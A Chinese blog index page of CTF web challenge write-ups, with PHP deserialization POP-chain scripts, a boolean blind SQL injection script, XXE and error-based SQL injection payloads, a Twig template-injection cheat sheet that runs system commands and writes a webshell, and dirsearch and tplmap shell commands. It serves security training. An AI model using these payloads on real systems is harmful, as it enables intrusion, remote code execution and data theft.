此博客已停用,请前往新的博客地址https://haorical.xyz

haorical的博客

haorical的博客

一分耕耘,一分收获

0%

发表于 阅读次数: Changyan:
本文字数: 2.2k 阅读时长 ≈ 4 分钟

[MRCTF2020]Ezpop

show->__wakeup–>show->__tostring–>test->__get–>modifier->__invoke

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
<?php
class Modifier {
    protected  $var;
    public function __construct($a)
    {
        $this->var=$a;
    }
}
class Show{
    public $source;
    public $str;
}
class Test{
    public $p;
}
$a = new Modifier('php://filter/read=convert.base64-encode/resource=flag.php');
$d = new Test();
$d->p=$a;
$b = new Show();
$b->str = $d;
$b->source = 'hhh';
$c = new Show();
$c->source = $b;
echo urlencode(serialize($c));

[NPUCTF2020]ReadlezPHP

flag在env里,phpinfo中system禁了,但eval没禁,不知道为啥用不了。

1
2
3
4
5
6
7
8
9
10
<?php
class HelloPhp
{
    public $a;
    public $b;
}
$c=new HelloPhp();
$c->a='phpinfo()';
$c->b='assert';
echo urlencode(serialize($c));

[极客大挑战 2019]FinalSQL

布尔盲注

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
import requests

url = "http://9e509658-ff70-4552-a198-b2dcb080c0c8.node4.buuoj.cn:81/search.php"
flag = ''

def payload(i, j):
    # sql = "1^(ord(substr((select(group_concat(schema_name))from(information_schema.schemata)),%d,1))>%d)^1" % (i, j)
    # sql = "1^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)='geek'),%d,1))>%d)^1" % (i, j) F1naI1y,Flaaaaag
    # sql = "1^(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name)='Flaaaaag'),%d,1))>%d)^1" % (i, j) id,fl4gawsl
    # sql = "1^(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name)='F1naI1y'),%d,1))>%d)^1" % (i, j) id,username,password
    sql = "1^(ord(substr((select(group_concat(id,username,password))from(F1naI1y)),%d,1))>%d)^1" % (i, j)
    data = {"id": sql}
    r = requests.get(url, params=data)
    # print (r.url)
    if "Click" in r.text:
        res = 1
    else:
        res = 0
    return res


def exp():
    global flag
    for i in range(1, 10000):
        print(i, ':')
        low = 31
        high = 127
        while low <= high:
            mid = (low + high) // 2
            res = payload(i, mid)
            if res:
                low = mid + 1
            else:
                high = mid - 1
        f = int((low + high + 1)) // 2
        if (f == 127 or f == 31):
            break
        # print (f)
        flag += chr(f)
        print(flag)


exp()
print('flag=', flag)

发表于 更新于 分类于 阅读次数: Changyan:
本文字数: 1.6k 阅读时长 ≈ 3 分钟

最近身体出了点状况,没时间也没精力刷了,先勉强做几个

阅读全文 »

发表于 更新于 分类于 阅读次数: Changyan:
本文字数: 18 阅读时长 ≈ 1 分钟

[De1CTF 2019]SSRF Me

发表于 更新于 分类于 阅读次数: Changyan:
本文字数: 2.6k 阅读时长 ≈ 4 分钟

JUST DO IT

xk0SzyKwfzw.php?Efa5BVG=cat /flag.txt

先本地测试,找到马后直接利用即可

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
import os
import requests
import re
import threading
import time
print('开始时间:  '+  time.asctime( time.localtime(time.time()) ))
s1=threading.Semaphore(100)  							  			#这儿设置最大的线程数
filePath = r"D:\phpstudy_pro\WWW\src"
os.chdir(filePath)													#改变当前的路径
requests.adapters.DEFAULT_RETRIES = 5								#设置重连次数,防止线程数过高,断开连接
files = os.listdir(filePath)
session = requests.Session()
session.keep_alive = False											 # 设置连接活跃状态为False
def get_content(file):
    s1.acquire()												
    print('trying   '+file+ '     '+ time.asctime( time.localtime(time.time()) ))
    with open(file,encoding='utf-8') as f:							#打开php文件,提取所有的$_GET和$_POST的参数
            gets = list(re.findall('\$_GET\[\'(.*?)\'\]', f.read()))
            posts = list(re.findall('\$_POST\[\'(.*?)\'\]', f.read()))
    data = {}														#所有的$_POST
    params = {}														#所有的$_GET
    for m in gets:
        params[m] = "echo 'hdh';"
    for n in posts:
        data[n] = "echo 'hdh';"
    url = 'http://127.0.0.1/'+file
    req = session.post(url, data=data, params=params)			#一次性请求所有的GET和POST
    req.close()												# 关闭请求  释放内存
    req.encoding = 'utf-8'
    content = req.text
    # print(content)
    # os.system('pause')
    if "hdh" in content:									#如果发现有可以利用的参数,继续筛选出具体的参数
        flag = 0
        for a in gets:
            req = session.get(url+'?%s='%a+"echo 'hdh';")
            content = req.text
            req.close()												# 关闭请求  释放内存
            if "hdh" in content:
                flag = 1
                break
        if flag != 1:
            for b in posts:
                req = session.post(url, data={b:"echo 'hdh';"})
                content = req.text
                req.close()												# 关闭请求  释放内存
                if "hdh" in content:
                    break
        if flag == 1:													#flag用来判断参数是GET还是POST,如果是GET,flag==1,则b未定义;如果是POST,flag为0,
            param = a
        else:
            param = b
        fuck=file
        bage=param
        print('找到了利用文件: '+file+"  and 找到了利用的参数:%s" %param)
        print('结束时间:  ' + time.asctime(time.localtime(time.time())))
    s1.release()

for i in files:															#加入多线程
   t = threading.Thread(target=get_content, args=(i,))
   t.start()

my upload

python3 dirsearch.py -u http://202.119.201.213:54334/ -e * –timeout=2 -t 1 -x 400,403,404,500,503,429

python3 .\dirsearch.py -u http://202.119.201.213:52980/ -e *

myflask

有点意外,直接tplmap可以拿到shell

python2 tplmap.py -u http://202.119.201.213:56276/loged?name --os-shell

签到

1
2
3
4
5
6
import base64
with open ('1.txt','r') as f:
    s = f.read()
for i in range(30):
    s=base64.b64decode(s).decode('utf-8')
print(s)

Easy_Base

1
2
3
4
5
6
7
import base64
with open ('flag.txt','r') as f:
    s = f.read()
s=base64.b16decode(s).decode('utf-8')
s=base64.b32decode(s).decode('utf-8')
s=base64.b64decode(s).decode('utf-8')
print(s)

发表于 分类于 阅读次数: Changyan:
本文字数: 1.1k 阅读时长 ≈ 2 分钟

[安洵杯 2019]easy_serialize_php

好难的题,用了2个小时,反序列化逃逸,上一次做还是在选拔赛上

d0g3_f1ag.php

一些草稿
_SESSION[phpflag]=s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}

"a:2:{s:7:"phpflag";s:39:"s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}"
;s}

"a:2:{s:7:"";hhhhh";s:1:"1";s:39:"s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}"
;s}

_SESSION[phpflag]=;s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}
此时session数组
phpfalg ==> ;s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}
img ==> 无效路径
序列化为
"a:2:{s:7:"phpflag";s:48:";s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}"
;s:img:xxxxxxxxxxxxxxxxxxxxxxxxxx}"
过滤后
"a:2:{s:7:"";s:48:";s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}"
;s:img:xxxxxxxxxxxxxxxxxxxxxxxxxx}" 逃逸成功
反序列化,此时session数组
";s:48: ==> 1
img ==> L2QwZzNfZmxsbGxsbGFn

[CISCN 2019 初赛]Love Math

发表于 分类于 阅读次数: Changyan:
本文字数: 2k 阅读时长 ≈ 3 分钟

[NCTF2019]Fake XML cookbook

1
2
3
4
5
6
7
8
9
<!DOCTYPE GVI [<!ENTITY xxe SYSTEM "file:///flag" >]>
<user>
    <username>
    &xxe;
    </username>
    <password>
    123
    </password>
</user>

php模板注入

https://www.cnblogs.com/bmjoker/p/13508538.html

TWIG

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
{{'/etc/passwd'|file_excerpt(1,30)}}

{{app.request.files.get(1).__construct('/etc/passwd','')}}

{{app.request.files.get(1).openFile.fread(99)}}

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("whoami")}}

{{_self.env.enableDebug()}}{{_self.env.isDebug()}}

{{["id"]|map("system")|join(",")

{{{"<?php phpinfo();":"/var/www/html/shell.php"}|map("file_put_contents")}}

{{["id",0]|sort("system")|join(",")}}

{{["id"]|filter("system")|join(",")}}

{{[0,0]|reduce("system","id")|join(",")}}

{{['cat /etc/passwd']|filter('system')}}

[ASIS 2019]Unicorn shop

传一个表示大数的unicode字符

https://www.compart.com/en/unicode/U+2187

我用的ↇ

[WUSTCTF2020]朴实无华

先charset改成utf-8编码

扫目录robots.txt

访问fl4g.php

payload

num=1e10
&md5=0e215962017
&get_flag=tac$IFS$1fllllllllllllllllllllllllllllllllllllllllaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaag

5.6版本php可以绕过,7.1的不行

1
2
3
4
5
6
7
8
9
10
if (isset($_GET['num'])){
    $num = $_GET['num'];
    if(intval($num) < 2020 && intval($num + 1) > 2021){
        echo "我不经意间看了看我的劳力士, 不是想看时间, 只是想不经意间, 让你知道我过得比你好.</br>";
    }else{
        die("金钱解决不了穷人的本质问题");
    }
}else{
    die("去非洲吧");
}

md5(0e215962017)正好也是0e开头,弱比较绕过

${IFS} $IFS$1都可以绕过空格

发表于 更新于 分类于 阅读次数: Changyan:
本文字数: 755 阅读时长 ≈ 1 分钟

[极客大挑战 2019]HardSQL

先fuzz,过滤了空格

1
admin' #

updatexml注入

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
查库
admin'or(updatexml(1,concat(0x7e,database(),0x7e),1))#

查表
admin'or(updatexml(1,concat(0x7e,(select(table_name)from(information_schema.tables)where(table_schema)like('geek')),0x7e),1))#

查列
admin'or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1')),0x7e),1))#

查数据
admin'or(updatexml(1,concat(0x7e,(select(group_concat(id,username,password))from(geek.H4rDsq1)where(id)like('1')),0x7e),1))#

admin'or(updatexml(1,concat(0x7e,(select(right(password,30))from(geek.H4rDsq1)where(id)like('1')),0x7e),1))#

flag{7e570192-d6e8-4d02-aa0b-d1b684f7ae53}